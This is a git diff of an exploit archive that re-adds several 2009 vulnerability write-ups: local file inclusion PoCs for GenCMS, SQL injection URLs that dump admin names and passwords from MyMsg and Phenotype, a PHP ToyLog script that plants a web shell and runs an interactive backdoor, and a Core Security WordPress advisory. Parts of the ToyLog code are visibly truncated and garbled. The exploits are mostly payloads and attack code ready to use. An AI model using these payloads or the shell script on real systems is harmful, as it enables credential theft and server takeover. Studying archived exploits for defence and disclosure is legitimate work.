-PoC: /admin/pages/SiteNew.php?step=2& ( POST: Template=../{FILE.PHP}%00 )
-
-# milw0rm.com [2009-07-10]
+GenCMS
+http://gencms.berlios.de/
+
+eLwaux(c)2009
+
+LFI
+/show.php
+----------------------------------------------------------------------------------------------------
+18:   $param = $_GET['p'];
+19:   if(empty($param)) $param = 'news';
+20:          //get right page
+21:       //$page = $param.'.php';
+22:	
+23:    //static or dynamic
+24:    if(GC_FULLSTATIC)
+25:    {
+26:        $page = $param.'.htm';
+27:        staticpage($page);
+28:    }
+29:    else
+30:    {
+31:        $page = GC_IPATH.'_base/sites/'.$param.'.php';
+32:        dynamicpage($page);
+33:    }
+----------------------------------------------------------------------------------------------------
+PoC: /show.php?p=../../{FILE.PHP}%00
+
+
+LFI
+/admin/pages/SiteNew.php
+----------------------------------------------------------------------------------------------------
+14:   if(!empty($_GET['step'])) $Step = $_GET['step'];
+23:   if ($Step == "2")
+24:   {
+25:        // allgemeine settings
+26:        //include blocks from template config
+27:        include_once(GC_IPATH.'templates/'.$_POST['Template'].'/config.php');
+28:        $TPLBlocks = explode(';',$TemplateSettings);
+29:   }
+----------------------------------------------------------------------------------------------------
+PoC: /admin/pages/SiteNew.php?step=2& ( POST: Template=../{FILE.PHP}%00 )
+
+# milw0rm.com [2009-07-10]
diff --git a/platforms/php/webapps/9105.txt b/platforms/php/webapps/9105.txt
index 3402e3e14..0f5f46f71 100755
--- a/platforms/php/webapps/9105.txt
+++ b/platforms/php/webapps/9105.txt
@@ -1,27 +1,27 @@
- ###################################################################
-###################################################################
-MyMsg 1.0.3 (Profile.php ) Remote SQL Injection Vuln
-###################################################################
-Founder : Monster-Dz
-Mail: u.2d[at]Hotmail[dot]CoM
-###################################################################
-Download:http://www.mymsg.al4us.com/index.php?Page=Download
-Home: WwW.Sa-SaFe.NeT ( H4ckF0rU.CoM Back Sooon )
-###################################################################
-SQL Injection Vulnerability  
-###################################################################
-Exploit:
-###################################################################
-                      1) First Register On ThE Site http://www.victim.com/User.php?Action=New
-       2) Login  
-                      3) Example: You Will Go At That Link   http://www.victim.com/Boxes.php?SES_ID=5f97b23814644739be5ac2d335773753&box=1
-       4) Exploit:
-         ---------
-      http://www.victim.com/Profile.php?SES_ID=| Your Session Id |&do=show&uid=-225+union+select+1,2,3,4,concat(Admin_Name,0x3a,Admin_Password),6,7,8,9,10,11,12+from+tbl_setting--
-Demo
-----
-http://www.mymsg.al4us.com/Demo/MyMsg_1.0.3/
-####################################################################
-Greeting : MasTer_Fin@L - ThE g0bL!N - Sarbot511 - DrEaDFuL aNd All My Friends
-
-# milw0rm.com [2009-07-10]
+ ###################################################################
+###################################################################
+MyMsg 1.0.3 (Profile.php ) Remote SQL Injection Vuln
+###################################################################
+Founder : Monster-Dz
+Mail: u.2d[at]Hotmail[dot]CoM
+###################################################################
+Download:http://www.mymsg.al4us.com/index.php?Page=Download
+Home: WwW.Sa-SaFe.NeT ( H4ckF0rU.CoM Back Sooon )
+###################################################################
+SQL Injection Vulnerability  
+###################################################################
+Exploit:
+###################################################################
+                      1) First Register On ThE Site http://www.victim.com/User.php?Action=New
+       2) Login  
+                      3) Example: You Will Go At That Link   http://www.victim.com/Boxes.php?SES_ID=5f97b23814644739be5ac2d335773753&box=1
+       4) Exploit:
+         ---------
+      http://www.victim.com/Profile.php?SES_ID=| Your Session Id |&do=show&uid=-225+union+select+1,2,3,4,concat(Admin_Name,0x3a,Admin_Password),6,7,8,9,10,11,12+from+tbl_setting--
+Demo
+----
+http://www.mymsg.al4us.com/Demo/MyMsg_1.0.3/
+####################################################################
+Greeting : MasTer_Fin@L - ThE g0bL!N - Sarbot511 - DrEaDFuL aNd All My Friends
+
+# milw0rm.com [2009-07-10]
diff --git a/platforms/php/webapps/9107.txt b/platforms/php/webapps/9107.txt
index cf6fe4a47..70f3d8d63 100755
--- a/platforms/php/webapps/9107.txt
+++ b/platforms/php/webapps/9107.txt
@@ -1,28 +1,28 @@
-#####################################################################################
-####                   Phenotype v2.8  Blind Sql Injection                       ####
-#####################################################################################
-#                                                                                   #
-#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
-#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
-#Our Site : http://ircrash.com                                                      #
-#My Official WebSite : http://r3dw0rm.ir                                            #
-#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr)            #
-#####################################################################################
-#                                                                                   #
-#Download : http://www.phenotype-cms.com                                            #
-#                                                                                   #
-#Dork : :(                                                                          #
-#                                                                                   #
-#####################################################################################
-#                                      [Bug]                                        #
-#                                                                                   #
-#http://[site]/_phenotype/admin/login.php?user=-999') and ascii(substring((select user_login from user limit 1,1),1,1))=[ascii code try]/*
-#http://[site]/_phenotype/admin/login.php?user=-999') and ascii(substring((select user_pass from user limit 1,1),1,1))=[ascii code try]/*
-#                                                                                   #
-#Note :                                                                             #
-#1. This bug in admin folder, but u dont need to login,u can use bug with out login #
-#2. If ascii is true u see login page else u see 500 Internal Server Error          #
-#                                                                                   #
-###################################### TNX GOD ######################################
-
-# milw0rm.com [2009-07-10]
+#####################################################################################
+####                   Phenotype v2.8  Blind Sql Injection                       ####
+#####################################################################################
+#                                                                                   #
+#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
+#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
+#Our Site : http://ircrash.com                                                      #
+#My Official WebSite : http://r3dw0rm.ir                                            #
+#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr)            #
+#####################################################################################
+#                                                                                   #
+#Download : http://www.phenotype-cms.com                                            #
+#                                                                                   #
+#Dork : :(                                                                          #
+#                                                                                   #
+#####################################################################################
+#                                      [Bug]                                        #
+#                                                                                   #
+#http://[site]/_phenotype/admin/login.php?user=-999') and ascii(substring((select user_login from user limit 1,1),1,1))=[ascii code try]/*
+#http://[site]/_phenotype/admin/login.php?user=-999') and ascii(substring((select user_pass from user limit 1,1),1,1))=[ascii code try]/*
+#                                                                                   #
+#Note :                                                                             #
+#1. This bug in admin folder, but u dont need to login,u can use bug with out login #
+#2. If ascii is true u see login page else u see 500 Internal Server Error          #
+#                                                                                   #
+###################################### TNX GOD ######################################
+
+# milw0rm.com [2009-07-10]
diff --git a/platforms/php/webapps/9109.txt b/platforms/php/webapps/9109.txt
index a0fc08200..f777ca1d6 100755
--- a/platforms/php/webapps/9109.txt
+++ b/platforms/php/webapps/9109.txt
@@ -1,82 +1,82 @@
---+++=====================================================================================+++--
---+++====== ToyLog 0.1 SQL Injection Vulnerability/Remote Command Execution Exploit ======+++--
---+++=====================================================================================+++--
-
-[+] SQL Injection Vulnerability
-Url: http://localhost/ToyLog/read.php?idm=1%20UNION%20ALL%20SELECT%201,username,password,4%20FROM%20user
-
-[+] Remote Command Execution Exploit
-
-#!/usr/bin/php
-                       +\n".
-		"- Ex.     : php xpl.php http://localhost/ToyLog/    -\n".
-		"+                                                   +\n".
-		"-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-\n".
-		"\n");
-}
-
-function hex_format ($string) {
-	$i=0;
-	while ($i(.+?) on|", fgets ($fp, 1024), $data))
-			$path = $data [1];
-	list ($path) = explode ("block/db.php", $path);
-	fclose ($fp);
-	return $path;
-}
-
-function upload_shell ($host, $dir) {
-	$fp = fsockopen ($host, 80);
-	$shell_path = get_path ($host, $dir)."shell.php";
-	if (!strcmp ($shell_path, "shell.php"))
-		die ("[-] Exploit failed.\n");
-	$query = hex_format('1 UNION ALL SELECT 1,2,\'xxxxxx\',4 INTO OUTFILE \''.$shell_path.'\' FROM post');
-	$req =	"GET {$dir}read.php?idm={$query} HTTP/1.1\r\n".
-		"Host: {$host}\r\n".
-		"Connection: Close\r\n\r\n";
-	fputs ($fp, $req);
-	fclose ($fp);
-}
-
-if (!preg_match ("|http://(.+?)(/.+/)|", $argv [1], $data))
-	usage ();
-array_shift ($data);
-list ($host, $dir) = $data;
-upload_shell ($host, $dir);
-$stdin = fopen ("php://stdin", "r");
-while (1) {
-	echo "backdoor@{$host}: ";
-	$cmd = hex_format(trim (fgets ($stdin, 1024)));
-	if (!strcmp ($cmd, hex_format("exit")))
-		break;
-	$out = explode ("xxx", file_get_contents ("http://{$host}{$dir}shell.php?cmd={$cmd}"));
-	array_shift ($out);
-	array_pop ($out);
-	echo $out [0];
-}
-
-?>
-
-# milw0rm.com [2009-07-10]
+--+++=====================================================================================+++--
+--+++====== ToyLog 0.1 SQL Injection Vulnerability/Remote Command Execution Exploit ======+++--
+--+++=====================================================================================+++--
+
+[+] SQL Injection Vulnerability
+Url: http://localhost/ToyLog/read.php?idm=1%20UNION%20ALL%20SELECT%201,username,password,4%20FROM%20user
+
+[+] Remote Command Execution Exploit
+
+#!/usr/bin/php
+                       +\n".
+		"- Ex.     : php xpl.php http://localhost/ToyLog/    -\n".
+		"+                                                   +\n".
+		"-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-\n".
+		"\n");
+}
+
+function hex_format ($string) {
+	$i=0;
+	while ($i(.+?) on|", fgets ($fp, 1024), $data))
+			$path = $data [1];
+	list ($path) = explode ("block/db.php", $path);
+	fclose ($fp);
+	return $path;
+}
+
+function upload_shell ($host, $dir) {
+	$fp = fsockopen ($host, 80);
+	$shell_path = get_path ($host, $dir)."shell.php";
+	if (!strcmp ($shell_path, "shell.php"))
+		die ("[-] Exploit failed.\n");
+	$query = hex_format('1 UNION ALL SELECT 1,2,\'xxxxxx\',4 INTO OUTFILE \''.$shell_path.'\' FROM post');
+	$req =	"GET {$dir}read.php?idm={$query} HTTP/1.1\r\n".
+		"Host: {$host}\r\n".
+		"Connection: Close\r\n\r\n";
+	fputs ($fp, $req);
+	fclose ($fp);
+}
+
+if (!preg_match ("|http://(.+?)(/.+/)|", $argv [1], $data))
+	usage ();
+array_shift ($data);
+list ($host, $dir) = $data;
+upload_shell ($host, $dir);
+$stdin = fopen ("php://stdin", "r");
+while (1) {
+	echo "backdoor@{$host}: ";
+	$cmd = hex_format(trim (fgets ($stdin, 1024)));
+	if (!strcmp ($cmd, hex_format("exit")))
+		break;
+	$out = explode ("xxx", file_get_contents ("http://{$host}{$dir}shell.php?cmd={$cmd}"));
+	array_shift ($out);
+	array_pop ($out);
+	echo $out [0];
+}
+
+?>
+
+# milw0rm.com [2009-07-10]
diff --git a/platforms/php/webapps/9110.txt b/platforms/php/webapps/9110.txt
index cedda96cc..baa852ec0 100755
--- a/platforms/php/webapps/9110.txt
+++ b/platforms/php/webapps/9110.txt
@@ -1,483 +1,483 @@
------BEGIN PGP SIGNED MESSAGE-----
-Hash: SHA1
-
-      Core Security Technologies - CoreLabs Advisory
-           http://www.coresecurity.com/corelabs/
-
-WordPress Privileges Unchecked in admin.php and Multiple Information
-Disclosures
-
-
-
-1. *Advisory Information*
-
-Title: WordPress Privileges Unchecked in admin.php and Multiple
-Information Disclosures
-Advisory ID: CORE-2009-0515
-Advisory URL:
-http://corelabs.coresecurity.com/index.php?action=view&type=advisory&name=WordPress_Privileges_Unchecked
-Date published: 2009-07-08
-Date of last update: 2009-07-08
-Vendors contacted: WordPress
-Release mode: Coordinated release
-
-
-2. *Vulnerability Information*
-
-Class: Local file include, Privileges unchecked, Cross site scripting
-(XSS), Information disclosure
-Remotely Exploitable: Yes
-Locally Exploitable: No
-Bugtraq ID: 35581, 35584
-CVE Name: CVE-2009-2334, CVE-2009-2335, CVE-2009-2336
-
-
-3. *Vulnerability Description*
-
-WordPress is a web application written in PHP that allows the easy
-installation of a flexible weblog on any computer connected to the
-Internet. WordPress 2.7 reached more than 6 million downloads during
-June 2009 [9].
-
-A vulnerability was found in the way that WordPress handles some URL
-requests. This results in unprivileged users viewing the content of
-plugins configuration pages, and also in some plugins modifying plugin
-options and injecting JavaScript code. Arbitrary native code may be run
-by a malicious attacker if the blog administrator runs injected
-JavasScript code that edits blog PHP code. Many WordPress-powered blogs,
-hosted outside 'wordpress.com', allow any person to create unprivileged
-users called subscribers. Other sensitive username information
-disclosures were found in WordPress.
-
-
-4. *Vulnerable packages*
-
-   . WordPress 2.8 and previous
-   . WordPress MU 2.7.1 and previous, used in WordPress.com
-
-
-5. *Non-vulnerable packages*
-
-   . WordPress 2.8.1
-   . WordPress MU 2.8.1, used in WordPress.com
-
-
-6. *Vendor Information, Solutions and Workarounds*
-
-Mitigation for the Privileges Unchecked vulnerability (suggested by Core
-Security): this vulnerability may be mitigated by controlling access to
-files inside the 'wp-admin' folder. Access can be prohibited by using
-Apache access control mechanism ('.htaccess' file), see guideline for
-more information [11].
-
-
-7. *Credits*
-
-These vulnerabilities were discovered and researched by Fernando
-Arnaboldi and José Orlicki from Core Security Technologies. Further
-research was made by Jose Orlicki from Core Security Technologies.
-
-
-8. *Technical Description / Proof of Concept Code*
-
-
-8.1. *Introduction*
-
-In the last few years several security bugs were found in WordPress
-[1][2]. During 2008, the big amount of bugs reported by researchers lead
-to exploitation by blog spammers [3]. During 2009, a new round of
-attacks has appeared and security researchers are reporting new bugs or
-wrongly fixed previously-reported bugs [4][5]. A path traversal in local
-files included by 'admin.php' has been fixed [6][7] but, in our case, we
-report that administrative privileges are still unchecked when accessing
-any PHP file inside a plugin folder.
-
-
-8.2. *Access Control Roles*
-
-WordPress has a privilege model where any user has an assigned role [8].
-Regarding plugins only users characterized by the role Administrator can
-activate plugins. Notice that only the blog hosting owner can add new
-plugins because these must by copied inside the host filesystem. The
-roles Editor, Author or Subscriber (the latter has the least privileges)
-cannot activate plugins, edit plugins, update plugins nor delete plugins
-installed by an Administrator. Besides that, the configuration of
-specific plugins is a grey area because there is no distinguished
-capability assigned [8].
-
-Also due to cross-site scripting vulnerabilities inside plugins options
-(something very common), non-administrative users reconfiguring plugins
-may inject persistent JavaScript code. Possibly arbitrary native code
-can be executed by the attacker if the blog administrator runs injected
-JavasScript code that injects PHP code. It is important to observe that
-many WordPress-powered blogs are configured to allow any blog visitor to
-create a Subscriber user without confirmation from the Administrator
-role inside the following URL, although by default the Administrator
-role must create these new users.
-
-/-----------
-
-http://[some_wordpress_blog]/wp-login.php?action=register
-- -----------/
-
- This can be modified by the administrator in 'Membership/Anyone can
-register'.
-
-/-----------
-
-http://[some_wordpress_blog]/wp-admin/options-general.php
-- -----------/
-
-
-
-
-8.3. *Privileges Unchecked in admin.php?page= Plugin Local File Includes
-(CVE-2009-2334, BID 35581)*
-
-No privileges are checked on WordPress plugins configuration PHP modules
-using parameter 'page' when we replace 'options-general.php' with
-'admin.php'. The same thing happens when replacing other modules such as
-'plugins.php' with 'admin.php'. Basic information disclosure is done
-this way. For example, with the following URL a user with no privileges
-can see the configuration of plugin Collapsing Archives, if installed.
-
-/-----------
-
-http://[some_wordpress_blog]/wp-admin/admin.php?page=/collapsing-archives/options.txt
-- -----------/
-
- Instead of the following allowed URL.
-
-/-----------
-
-http://[some_wordpress_blog]/wp-admin/options-general.php?page=collapsing-archives/options.txt
-- -----------/
-
- Another example of this information disclosure is shown on Akismet, a
-plugin shipped by default with WordPress.
-
-/-----------
-
-http://[some_wordpress_blog]/wp-admin/admin.php?page=akismet/readme.txt
-- -----------/
-
- All plugins we have tested are vulnerable to this kind of information
-disclosure, but in many of them the PHP files accessed just crashed. On
-the other hand, for example, with capability 'import', privileges are
-checked inside 'admin.php':
-
-/-----------
-
-if ( ! current_user_can('import') )
-    wp_die(__('You are not allowed to import.'));
-- -----------/
-
- More dangerous scenarios exist, all of them can be exploited by users
-with the Subscriber role, the least privileged.
-
-
-8.4. *Abuse example: XSS in plugin configuration module*
-
-If installed, *Related Ways To Take Action* is an example of a WordPress
-plugin that is affected by many cross-site scripting vulnerabilities
-(XSS) that can be leveraged by an attacker using the unchecked
-privileges described in this advisory to inject persistent JavaScript
-code. Possibly, arbitrary native code can be executed by the attacker if
-the blog administrator, when he/she logs in, runs injected JavasScript
-code that edits blog PHP code. The original URL for reconfiguring the
-plugin can be accessed only by the Administrator role.
-
-/-----------
-
-http://[some_wordpress_blog]/wordpress/wp-admin/options-general.php?page=related-ways-to-take-action/options.php
-- -----------/
-
- But replacing the PHP file with the generic 'admin.php' any blog user
-can modify this configuration.
-
-/-----------
-
-http://[some_wordpress_blog]/wp-admin/admin.php?page=related-ways-to-take-action/options.php
-- -----------/
-
- The following JavaScript injection can be entered within field *Exclude
-actions by term* to exemplify this kind of abuse. When the administrator
-enters the same page the injected browser code will be executed and
-possibly blog PHP can be modified to run arbitrary native code.
-
-/-----------
-
-\"/>June 3rd, 2009 
-- -----------/
-
-
-
-Also several administrative modules give to anyone the complete path
-where the web application is hosted inside the server. This may simplify
-or enable other malicious attacks. An example follows.
-
-/-----------
-
-http://[some_wordpress_blog]/wp-settings.php
-- -----------/
-
-
-
-/-----------
-
-Notice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in
-[WP_LEAKED_PATH]\wp-settings.php on line 110
-Notice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in
-[WP_LEAKED_PATH]\wp-settings.php on line 112
-Warning: require(ABSPATHwp-includes/compat.php) [function.require]:
-failed to open stream:
-No such file or directory in [WP_LEAKED_PATH]\wp-settings.php on line 246
-Fatal error: require() [function.require]: Failed opening required
-'ABSPATHwp-includes/compat.php'
-(include_path='.;[PHP_LEAKED_PATH]\php5\pear') in
-[WP_LEAKED_PATH]\wp-settings.php on line 246
-
-- -----------/
-
-
-
-
-9. *Report Timeline*
-
-. 2009-06-04:
-Core Security Technologies notifies the WordPress team of the
-vulnerabilities (security@wordpress.org) and offers a technical
-description encrypted or in plain-text. Advisory is planned for
-publication on June 22th.
-
-. 2009-06-08:
-Core notifies again the WordPress team of the vulnerability.
-
-. 2009-06-10:
-The WordPress team asks Core for a technical description of the
-vulnerability in plain-text.
-
-. 2009-06-11:
-Technical details sent to WordPress team by Core.
-
-. 2009-06-11:
-WordPress team notifies Core that a fix was produced and is available to
-Core for testing. WordPress team asserts that password and username
-discrimination as well as username leakage are known and will not be
-fixed because they are convenient for the users.
-
-. 2009-06-12:
-Core tells the WordPress team that the patch will be tested by Core as a
-courtesy as soon as possible. It also requests confirmation that
-WordPress versions 2.8 and earlier, and WordPress.com, are vulnerable to
-the flaws included in the advisory draft CORE-2009-0515.
-
-. 2009-06-12:
-WordPress team confirms that WordPress 2.8 and earlier plus
-WordPress.com are vulnerable to the flaws included in the advisory draft.
-
-. 2009-06-17:
-Core informs the WordPress team that the patch is only fixing one of the
-four proof of concept abuses included in the advisory draft. Core
-reminds the WordPress team that the advisory is scheduled to be
-published on June 22th but a new schedule can be discussed.
-
-. 2009-06-19:
-Core asks for a new patched version of WordPress, if available, and
-notifies the WordPress team that the publication of the advisory was
-re-scheduled to June 30th.
-
-. 2009-06-19:
-WordPress team confirms they have a new patch that has the potential to
-break a lot of plugins.
-
-. 2009-06-29:
-WordPress team asks for a delayance on advisory CORE-2009-0515
-publication until July 6th, when WordPress MU version will be patched.
-
-. 2009-06-29:
-Core agrees to delay publication of advisory CORE-2009-0515 until July 6th.
-
-. 2009-06-29:
-Core tells the WordPress team that other administrative PHP modules can
-also be rendered by non-administrative users, such as module
-'admin-post.php' and 'link-parse-opml.php'.
-
-. 2009-07-02:
-WordPress team comments that 'admin.php' and 'admin-post.php' are
-intentionally open and plugins can choose to hook either privileged or
-unprivileged actions. They also comment that unprivileged access to
-'link-parse-opml.php' is benign but having this file open is bad form.
-
-. 2009-07-02:
-Core sends the WordPress team a new draft of the advisory and comments
-that there is no capability specified in Worpress documentation for
-configuring plugins. Also control of actions registered by plugins is
-not enforced. Core also notices that the privileges unchecked bug in
-'admin.php?page=' is fixed on WordPress 2.8.1-beta2 latest development
-release.
-
-. 2009-07-06:
-Core requests WordPress confirmation of the release date of WordPress
-2.8.1 and WordPress MU 2.8.
-
-. 2009-07-07:
-WordPress team confirms that a release candidate of WordPress 2.8.1 is
-made available to users and that the advisory may be published.
-
-. 2009-07-06:
-Core requests WordPress confirmation of the release date of WordPress MU
-and WordPress MU new version numbers.
-
-. 2009-07-07:
-WordPress team release WordPress 2.8.1 RC1 to its users.
-
-. 2009-07-08:
-WordPress team confirms that WordPress MU 2.8.1 will be made available
-as soon WordPress 2.8.1 is officially released. Probably July 8th or 9th.
-
-. 2009-07-08:
-The advisory CORE-2009-0515 is published.
-
-
-
-10. *References*
-
-[1] WordPress vulnerabilities in CVE database
-http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wordpress
-[2] SecuriTeam List of WordPress Vulnerabilities
-http://www.securiteam.com/products/W/Wordpress.html
-[3] WordPress Vulnerability - YBO Interactive Blog
-http://www.ybo-interactive.com/blog/2008/03/30/wordpress-vulnerability/
-[4] bablooO/blyat attacks on WP 2.7.0 and 2.7.1
-http://wordpress.org/support/topic/280748
-[5] Security breach - xkcd blog
-http://blag.xkcd.com/2009/06/18/security-breach/
-[6] securityvulns.com WordPress vulnerabilities digest in English
-http://www.securityfocus.com/archive/1/archive/1/485786/100/0/threaded
-[7] CVE-2008-0196
-http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0196
-[8] WordPress Roles and Capabilities
-http://codex.wordpress.org/Roles_and_Capabilities
-[9] WordPress Download Counter
-http://wordpress.org/download/counter/
-[10] WordPress Intrusion Detection System Plugin
-http://php-ids.org/2008/02/21/wpids-version-012-released/
-[11] Hardening WordPress with htaccess
-http://blogsecurity.net/wordpress/article-210607
-
-
-11. *About CoreLabs*
-
-CoreLabs, the research center of Core Security Technologies, is charged
-with anticipating the future needs and requirements for information
-security technologies. We conduct our research in several important
-areas of computer security including system vulnerabilities, cyber
-attack planning and simulation, source code auditing, and cryptography.
-Our results include problem formalization, identification of
-vulnerabilities, novel solutions and prototypes for new technologies.
-CoreLabs regularly publishes security advisories, technical papers,
-project information and shared software tools for public use at:
-http://www.coresecurity.com/corelabs.
-
-
-12. *About Core Security Technologies*
-
-Core Security Technologies develops strategic solutions that help
-security-conscious organizations worldwide develop and maintain a
-proactive process for securing their networks. The company's flagship
-product, CORE IMPACT, is the most comprehensive product for performing
-enterprise security assurance testing. CORE IMPACT evaluates network,
-endpoint and end-user vulnerabilities and identifies what resources are
-exposed. It enables organizations to determine if current security
-investments are detecting and preventing attacks. Core Security
-Technologies augments its leading technology solution with world-class
-security consulting services, including penetration testing and software
-security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
-Security Technologies can be reached at 617-399-6980 or on the Web at
-http://www.coresecurity.com.
-
-
-13. *Disclaimer*
-
-The contents of this advisory are copyright (c) 2009 Core Security
-Technologies and (c) 2009 CoreLabs, and may be distributed freely
-provided that no fee is charged for this distribution and proper credit
-is given.
-
-
-14. *PGP/GPG Keys*
-
-This advisory has been signed with the GPG key of Core Security
-Technologies advisories team, which is available for download at
-http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
------BEGIN PGP SIGNATURE-----
-Version: GnuPG v1.4.6 (MingW32)
-Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
-
-iD8DBQFKVR7gyNibggitWa0RAin3AKCOrLLQ8XZnrCLot5d9xoZW6sdWwwCfTJ4N
-TPRpR0Gn0WqmF8HOeDslbA8=
-=zEDK
------END PGP SIGNATURE-----
-
-# milw0rm.com [2009-07-10]
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA1
+
+      Core Security Technologies - CoreLabs Advisory
+           http://www.coresecurity.com/corelabs/
+
+WordPress Privileges Unchecked in admin.php and Multiple Information
+Disclosures
+
+
+
+1. *Advisory Information*
+
+Title: WordPress Privileges Unchecked in admin.php and Multiple
+Information Disclosures
+Advisory ID: CORE-2009-0515
+Advisory URL:
+http://corelabs.coresecurity.com/index.php?action=view&type=advisory&name=WordPress_Privileges_Unchecked
+Date published: 2009-07-08
+Date of last update: 2009-07-08
+Vendors contacted: WordPress
+Release mode: Coordinated release
+
+
+2. *Vulnerability Information*
+
+Class: Local file include, Privileges unchecked, Cross site scripting
+(XSS), Information disclosure
+Remotely Exploitable: Yes
+Locally Exploitable: No
+Bugtraq ID: 35581, 35584
+CVE Name: CVE-2009-2334, CVE-2009-2335, CVE-2009-2336
+
+
+3. *Vulnerability Description*
+
+WordPress is a web application written in PHP that allows the easy
+installation of a flexible weblog on any computer connected to the
+Internet. WordPress 2.7 reached more than 6 million downloads during
+June 2009 [9].
+
+A vulnerability was found in the way that WordPress handles some URL
+requests. This results in unprivileged users viewing the content of
+plugins configuration pages, and also in some plugins modifying plugin
+options and injecting JavaScript code. Arbitrary native code may be run
+by a malicious attacker if the blog administrator runs injected
+JavasScript code that edits blog PHP code. Many WordPress-powered blogs,
+hosted outside 'wordpress.com', allow any person to create unprivileged
+users called subscribers. Other sensitive username information
+disclosures were found in WordPress.
+
+
+4. *Vulnerable packages*
+
+   . WordPress 2.8 and previous
+   . WordPress MU 2.7.1 and previous, used in WordPress.com
+
+
+5. *Non-vulnerable packages*
+
+   . WordPress 2.8.1
+   . WordPress MU 2.8.1, used in WordPress.com
+
+
+6. *Vendor Information, Solutions and Workarounds*
+
+Mitigation for the Privileges Unchecked vulnerability (suggested by Core
+Security): this vulnerability may be mitigated by controlling access to
+files inside the 'wp-admin' folder. Access can be prohibited by using
+Apache access control mechanism ('.htaccess' file), see guideline for
+more information [11].
+
+
+7. *Credits*
+
+These vulnerabilities were discovered and researched by Fernando
+Arnaboldi and José Orlicki from Core Security Technologies. Further
+research was made by Jose Orlicki from Core Security Technologies.
+
+
+8. *Technical Description / Proof of Concept Code*
+
+
+8.1. *Introduction*
+
+In the last few years several security bugs were found in WordPress
+[1][2]. During 2008, the big amount of bugs reported by researchers lead
+to exploitation by blog spammers [3]. During 2009, a new round of
+attacks has appeared and security researchers are reporting new bugs or
+wrongly fixed previously-reported bugs [4][5]. A path traversal in local
+files included by 'admin.php' has been fixed [6][7] but, in our case, we
+report that administrative privileges are still unchecked when accessing
+any PHP file inside a plugin folder.
+
+
+8.2. *Access Control Roles*
+
+WordPress has a privilege model where any user has an assigned role [8].
+Regarding plugins only users characterized by the role Administrator can
+activate plugins. Notice that only the blog hosting owner can add new
+plugins because these must by copied inside the host filesystem. The
+roles Editor, Author or Subscriber (the latter has the least privileges)
+cannot activate plugins, edit plugins, update plugins nor delete plugins
+installed by an Administrator. Besides that, the configuration of
+specific plugins is a grey area because there is no distinguished
+capability assigned [8].
+
+Also due to cross-site scripting vulnerabilities inside plugins options
+(something very common), non-administrative users reconfiguring plugins
+may inject persistent JavaScript code. Possibly arbitrary native code
+can be executed by the attacker if the blog administrator runs injected
+JavasScript code that injects PHP code. It is important to observe that
+many WordPress-powered blogs are configured to allow any blog visitor to
+create a Subscriber user without confirmation from the Administrator
+role inside the following URL, although by default the Administrator
+role must create these new users.
+
+/-----------
+
+http://[some_wordpress_blog]/wp-login.php?action=register
+- -----------/
+
+ This can be modified by the administrator in 'Membership/Anyone can
+register'.
+
+/-----------
+
+http://[some_wordpress_blog]/wp-admin/options-general.php
+- -----------/
+
+
+
+
+8.3. *Privileges Unchecked in admin.php?page= Plugin Local File Includes
+(CVE-2009-2334, BID 35581)*
+
+No privileges are checked on WordPress plugins configuration PHP modules
+using parameter 'page' when we replace 'options-general.php' with
+'admin.php'. The same thing happens when replacing other modules such as
+'plugins.php' with 'admin.php'. Basic information disclosure is done
+this way. For example, with the following URL a user with no privileges
+can see the configuration of plugin Collapsing Archives, if installed.
+
+/-----------
+
+http://[some_wordpress_blog]/wp-admin/admin.php?page=/collapsing-archives/options.txt
+- -----------/
+
+ Instead of the following allowed URL.
+
+/-----------
+
+http://[some_wordpress_blog]/wp-admin/options-general.php?page=collapsing-archives/options.txt
+- -----------/
+
+ Another example of this information disclosure is shown on Akismet, a
+plugin shipped by default with WordPress.
+
+/-----------
+
+http://[some_wordpress_blog]/wp-admin/admin.php?page=akismet/readme.txt
+- -----------/
+
+ All plugins we have tested are vulnerable to this kind of information
+disclosure, but in many of them the PHP files accessed just crashed. On
+the other hand, for example, with capability 'import', privileges are
+checked inside 'admin.php':
+
+/-----------
+
+if ( ! current_user_can('import') )
+    wp_die(__('You are not allowed to import.'));
+- -----------/
+
+ More dangerous scenarios exist, all of them can be exploited by users
+with the Subscriber role, the least privileged.
+
+
+8.4. *Abuse example: XSS in plugin configuration module*
+
+If installed, *Related Ways To Take Action* is an example of a WordPress
+plugin that is affected by many cross-site scripting vulnerabilities
+(XSS) that can be leveraged by an attacker using the unchecked
+privileges described in this advisory to inject persistent JavaScript
+code. Possibly, arbitrary native code can be executed by the attacker if
+the blog administrator, when he/she logs in, runs injected JavasScript
+code that edits blog PHP code. The original URL for reconfiguring the
+plugin can be accessed only by the Administrator role.
+
+/-----------
+
+http://[some_wordpress_blog]/wordpress/wp-admin/options-general.php?page=related-ways-to-take-action/options.php
+- -----------/
+
+ But replacing the PHP file with the generic 'admin.php' any blog user
+can modify this configuration.
+
+/-----------
+
+http://[some_wordpress_blog]/wp-admin/admin.php?page=related-ways-to-take-action/options.php
+- -----------/
+
+ The following JavaScript injection can be entered within field *Exclude
+actions by term* to exemplify this kind of abuse. When the administrator
+enters the same page the injected browser code will be executed and
+possibly blog PHP can be modified to run arbitrary native code.
+
+/-----------
+
+\"/>June 3rd, 2009 
+- -----------/
+
+
+
+Also several administrative modules give to anyone the complete path
+where the web application is hosted inside the server. This may simplify
+or enable other malicious attacks. An example follows.
+
+/-----------
+
+http://[some_wordpress_blog]/wp-settings.php
+- -----------/
+
+
+
+/-----------
+
+Notice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in
+[WP_LEAKED_PATH]\wp-settings.php on line 110
+Notice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in
+[WP_LEAKED_PATH]\wp-settings.php on line 112
